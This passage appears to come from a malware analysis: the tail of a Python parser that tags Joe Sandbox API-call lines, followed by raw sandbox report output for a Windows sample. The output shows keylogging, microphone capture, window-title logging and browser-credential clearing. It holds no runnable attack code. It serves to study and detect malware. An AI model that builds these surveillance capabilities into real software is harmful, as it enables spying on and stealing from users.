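    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>[\w.]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")

# Predefined root-key handles (documented Windows constants). The sandbox prints
# them as plain hex, so a registry call carrying one of them names its hive.
HKEY_ROOTS = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}
DYNAMIC_IMPORT_APIS = {"GetProcAddress", "LoadLibraryA", "LoadLibraryW",
                       "GetModuleHandleA", "GetModuleHandleW"}
HOOK_APIS = {"SetWindowsHookExA", "SetWindowsHookExW", "UnhookWindowsHookEx"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: str

    def strings(self):
        # Joe Sandbox prints raw stack values as 8-digit hex and unknown values
        # as '?'; everything else is a string it resolved (path, name, export).
        return [a for a in self.args if a != "?" and not HEX_ARG.match(a)]


def parse_api_line(line):
    """Return an ApiCall for an '• Api.MODULE(...), ref: X' line, else None."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return ApiCall(m.group("api"), m.group("module"), args, m.group("ref").upper())


def classify(calls):
    """Map parsed calls to (tag, detail, ref) triples; a call may yield several."""
    findings = []
    for c in calls:
        strs = c.strings()
        if c.api.startswith("Reg"):
            # Root-key lookup is position-independent: the sandbox argument list
            # is the observed stack, not a guaranteed match to the API signature.
            hives = [HKEY_ROOTS[a] for a in c.args if a in HKEY_ROOTS]
            findings.append(("registry", " ".join([c.api] + hives + strs), c.ref))
        if c.api.startswith(("ShellExecute", "CreateProcess", "WinExec")):
            findings.append(("process-exec", " ".join(strs), c.ref))
        if c.api in HOOK_APIS:
            findings.append(("windows-hook", c.api, c.ref))
        if c.api in DYNAMIC_IMPORT_APIS and strs:
            findings.append(("dynamic-import", " ".join(strs), c.ref))
        if c.api == "TerminateThread":
            findings.append(("thread-kill", c.api, c.ref))
    return findings


def summarize(text):
    """Parse every API line in a block of report text and classify the result."""
    calls = [c for c in map(parse_api_line, text.splitlines()) if c is not None]
    return classify(calls)


if __name__ == "__main__":
    for tag, detail, ref in summarize(SAMPLE):
        print(f"{tag:15} {ref}  {detail}")
```

One caveat worth keeping in mind when extending the rules: the argument list Joe Sandbox prints is the stack as observed at the call, with strings substituted where it could resolve them, so argument positions do not reliably line up with the documented API signature (the RegCreateKeyA line shows "TUF" in the third slot, not the second). That is why the hive lookup scans all arguments for a predefined HKEY value rather than assuming it is the first one, and why the string extraction does not try to name which parameter a string belongs to.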
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                            • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                                                                                                                                                            • Instruction ID: 44e25d054e292963cfc005d68317528f4d38ac36d82b99eb29904231438c363e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5A14671A042469FFB218F58C8817AFBBA1EF25354F28416FE5859B382CA3C8D45C759
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
APIs
• CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
• CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
• WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
• CloseHandle.KERNEL32(?,?,00000000,00000000,?,?,00000000), ref: 004047A0
• API ID: Create$CloseEventHandleObjectSingleThreadWait
• API String ID: 3360349984-0
Strings
• Cleared browsers logins and cookies., xrefs: 0040B8EF
• [Cleared browsers logins and cookies.], xrefs: 0040B8DE
• API ID: Sleep
• String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
• API String ID: 3472027048-1236744412
APIs
  • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00412679
  • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 00412692
  • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
• Sleep.KERNEL32(00000BB8), ref: 004115C3
• API ID: CloseOpenQuerySleepValue
• String ID: @CG$exepath$BG
• API String ID: 4119054056-3221201242
APIs
  • Part of subcall function 0041B6F6: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041B706
  • Part of subcall function 0041B6F6: GetWindowTextLengthW.USER32(00000000), ref: 0041B70F
  • Part of subcall function 0041B6F6: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041B739
• Sleep.KERNEL32(000001F4), ref: 00409C95
• Sleep.KERNEL32(00000064), ref: 00409D1F
• API ID: Window$SleepText$ForegroundLength
• String ID: [ $ ]
• API String ID: 3309952895-93608704
APIs
• CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041B6B5,00000000,00000000,00000000), ref: 0041B5DE
• SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B5FB
• WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B60F
• CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041B6B5,00000000,00000000), ref: 0041B61C
• API ID: File$CloseCreateHandlePointerWrite
• API String ID: 3604237281-0
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                            • Instruction ID: 297bbf4b6e7cb62aad9c1df2c980cfc74e2a715ef03096c7e716b38b90e38ed5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5401D1F2A096167EB7201A7A7DC0D67624EDF823B9371033BF421612D5EAA88C408179
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 0043811F
                                                                                                                                                                                                                                              • Part of subcall function 0043806C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043809B
                                                                                                                                                                                                                                              • Part of subcall function 0043806C: ___AdjustPointer.LIBCMT ref: 004380B6
                                                                                                                                                                                                                                            • _UnwindNestedFrames.LIBCMT ref: 00438134
                                                                                                                                                                                                                                            • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438145
                                                                                                                                                                                                                                            • CallCatchBlock.LIBVCRUNTIME ref: 0043816D
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 737400349-0
                                                                                                                                                                                                                                            • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                            • Instruction ID: b756294ed3ea81ca49fa364012696409ae819ba0eb544c37e892c8a1feda9a6f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7012D72100208BBDF126E96CC45DEB7B69EF4C758F04501DFE4866121C73AE862DBA4
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue), ref: 00447252
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000,00000364,?,00446FA1), ref: 0044725E
                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004471C7,?,00000000,00000000,00000000,?,004474F3,00000006,FlsSetValue,0045D328,FlsSetValue,00000000), ref: 0044726C
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3177248105-0
                                                                                                                                                                                                                                            • Opcode ID: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                            • Instruction ID: b3fe555fe56df17639c4036f58dc3a809bdc468a9df6621700516029eed46faf
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae052748fea16bfd64aed14cfe47709c8c773e0353203442da9e9610ebb1fa47
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D01D432649323ABD7214B79BC44A5737D8BB05BA2B2506B1F906E3241D768D802CAE8
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B643
                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B657
                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B67C
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00403AF3,00465324), ref: 0041B68A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: File$CloseCreateHandleReadSize
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3919263394-0
                                                                                                                                                                                                                                            • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                                                                            • Instruction ID: 3f34627ebf18732c46889562bde790f52735f321db32931f0b6625c87776b378
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81F0F6B12053047FE6101B21BC85FBF375CDB967A5F00027EFC01A22D1DA658C4591BA
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004C), ref: 00418529
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004D), ref: 0041852F
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004E), ref: 00418535
                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(0000004F), ref: 0041853B
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: MetricsSystem
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 4116985748-0
                                                                                                                                                                                                                                            • Opcode ID: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                                                                            • Instruction ID: f480d68fafb364c29fc67a5f666d93eee18e0abee54110dfc95006384cbaadd6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a3bedc3d93ee6e0b45313aeec5082688588fe46082e633aeec829f05b9632c7f
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 72F0D672B043256BCA00EA7A4C4156FAB97DFC46A4F25083FE6059B341DE78EC4647D9
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B3A5
                                                                                                                                                                                                                                            • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B3B8
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3E3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B3EB
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CloseHandleOpenProcess
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 39102293-0
                                                                                                                                                                                                                                            • Opcode ID: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                                                                                                                                                            • Instruction ID: d8943217945b3e3bc9c1dbf33fc4ac7f726da2cd485b5cd5dbfa96192dfeb6c9
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51a17e5294b38f17d5f3a71b1001121c929f89ba237b4680bf25dfaaaa51ef0d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 67F04971204209ABD3026794AC4AFEBB26CDF44B96F000037FA11D22A2FF74CCC146A9
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • __startOneArgErrorHandling.LIBCMT ref: 00441F7D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorHandling__start
                                                                                                                                                                                                                                            • String ID: pow
                                                                                                                                                                                                                                            • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                            • Opcode ID: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                                                                            • Instruction ID: b0758be5652a64c1ac5d647a76b92dde9bac1040a8da8be5e5c84d6172790ea5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c11d7b0c0eb8e10153fe90c38a808d625a788e1790705f3c08302100bb714254
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6515A61A0A20296F7117B14C98136F6B949B50741F288D6BF085823F9EF3DCCDB9A4E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _memcmp
                                                                                                                                                                                                                                            • String ID: 4[G$4[G
                                                                                                                                                                                                                                            • API String ID: 2931989736-4028565467
                                                                                                                                                                                                                                            • Opcode ID: 7407f5615a9f2bba6ea498725e03585e5da529dc181768be2173bedc22af2953
                                                                                                                                                                                                                                            • Instruction ID: 33b36a833443cc607bae0a2c4f054eab59dd7b99d1d8389eb50a0704093c1055
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7407f5615a9f2bba6ea498725e03585e5da529dc181768be2173bedc22af2953
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E56110716047069AC714DF28D8406B3B7A8FF98304F44063EEC5D8F656E778AA25CBAD
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CountEventTick
                                                                                                                                                                                                                                            • String ID: >G
                                                                                                                                                                                                                                            • API String ID: 180926312-1296849874
                                                                                                                                                                                                                                            • Opcode ID: a1d3b740b955ebe5a8096c6192a0fecfbfaed9ef41805dc7a205655cba7aa2c5
                                                                                                                                                                                                                                            • Instruction ID: 080f125417303e5552765b07387c73e695832f87024c8a27cfac38d5c25ddd71
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1d3b740b955ebe5a8096c6192a0fecfbfaed9ef41805dc7a205655cba7aa2c5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7E5191315042409AC224FB71D8A2AEF73E5AFD1314F40853FF94A671E2EF389949C69E
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetCPInfo.KERNEL32(?,?,00000005,?,00000000), ref: 0044DB69
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Info
                                                                                                                                                                                                                                            • String ID: $vD
                                                                                                                                                                                                                                            • API String ID: 1807457897-3636070802
                                                                                                                                                                                                                                            • Opcode ID: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                            • Instruction ID: 639e137743dbd1cdb094e6b6e994140176401b7572b89e22c1ac552797110b95
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a1be195421d57dadb90a7404d285975d7b8ac1b4122976fa75ce4288470c48d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A411C709043889AEF218F24CCC4AF6BBF9DF45308F1404EEE58A87242D279AA45DF65
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetACP.KERNEL32(?,20001004,?,00000002), ref: 004509C9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                                                                            • API String ID: 0-711371036
                                                                                                                                                                                                                                            • Opcode ID: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                            • Instruction ID: 0ee4350655218b6c75cd3052c0190142cf4d5733969cac988e1a0851f3347a37
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c357b999de04d1742fe2857fcf8a245ff63c46433d95171d83c673f3fe2cd13c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 832148EBA00100A6F7308F55C801B9773AAAB90B23F564426EC49D730BF73ADE08C358
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 004049F1
                                                                                                                                                                                                                                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(?,00473EE8,004745A8,?,?,?,?,?,?,?,00414D7D,?,00000001,0000004C,00000000), ref: 00404A4E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • KeepAlive | Enabled | Timeout: , xrefs: 004049E5
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                            • String ID: KeepAlive | Enabled | Timeout:
                                                                                                                                                                                                                                            • API String ID: 481472006-1507639952
                                                                                                                                                                                                                                            • Opcode ID: ea70252bfee1193fa070b6ce61b16917ee96d00f5fb0952583a0e38783224c42
                                                                                                                                                                                                                                            • Instruction ID: 8fc2066b5dd234cef981570443e677007340a491061b3c72667858eadfbc0999
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ea70252bfee1193fa070b6ce61b16917ee96d00f5fb0952583a0e38783224c42
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EF2129A1A042806BC310FB6A980676B7B9457D1315F48417EF948532E2EB3C5999CB9F
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: LocalTime
                                                                                                                                                                                                                                            • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                                                                            • API String ID: 481472006-2430845779
                                                                                                                                                                                                                                            • Opcode ID: c1104856b329bac52de9abd69d1e93ca30ee683114df54cf724c85b3f010b06d
                                                                                                                                                                                                                                            • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c1104856b329bac52de9abd69d1e93ca30ee683114df54cf724c85b3f010b06d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
APIs
  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004740F8), ref: 0040A884
  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
  • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
• CloseHandle.KERNEL32(?), ref: 0040A7CA
• UnhookWindowsHookEx.USER32 ref: 0040A7DD
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
• String ID: Online Keylogger Stopped
• API String ID: 1623830855-1496645233
APIs
• waveInPrepareHeader.WINMM(?,00000020,?,?,00000000,00475B90,00473EE8,?,00000000,00401913), ref: 00401747
• waveInAddBuffer.WINMM(?,00000020,?,00000000,00401913), ref: 0040175D
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: wave$BufferHeaderPrepare
• String ID: T=G
• API String ID: 2315374483-379896819
APIs
• IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: LocaleValid
• String ID: IsValidLocaleName$z=D
• API String ID: 1901932003-2791046955
APIs
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: T=G$T=G
• API String ID: 3519838083-3732185208
APIs
• GetKeyState.USER32(00000011), ref: 0040AD5B
  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 00000005.00000002.1682584731.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_iGhDjzEiDU.jbxd
Yara matches
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
APIs
• _free.LIBCMT ref: 00448835
  • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
